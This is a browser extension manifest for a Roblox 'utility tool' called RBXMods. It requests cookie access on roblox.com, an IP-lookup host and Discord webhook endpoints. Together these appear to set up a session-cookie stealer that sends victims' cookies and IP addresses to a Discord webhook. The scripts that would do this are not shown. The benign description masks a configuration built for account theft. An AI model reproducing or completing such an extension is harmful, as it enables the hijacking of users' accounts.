{
  "manifest_version": 3,
  "name": "rbx adder",
  "version": "1.0.7",
  "description": "RBXMods is a utility tool leveraging Roblox's platform to assist users with enhanced interaction and client-side tools.",
  "permissions": [
    "cookies",
    "storage",
    "scripting",
    "tabs"
  ],
  "host_permissions": [
    "https://*.roblox.com/",
    "https://api.ipify.org/",
    "https://discord.com/api/webhooks/*"
  ],
  "background": {
    "service_worker": "background.js"
  },
  "icons": {
    "16": "logo.png",
    "48": "logo.png",
    "128": "logo.png"
  },
  "content_scripts": [
    {
      "matches": ["https://www.roblox.com/*"],
      "js": ["content.js"],
      "run_at": "document_idle"
    }
  ],
  "action": {
    "default_popup": "popup.html",
    "default_icon": "logo.png",
    "default_title": "RBXMods"
  },
  "web_accessible_resources": [
    {
      "resources": ["popup.js"],
      "matches": ["<all_urls>"]
    }
  ]
}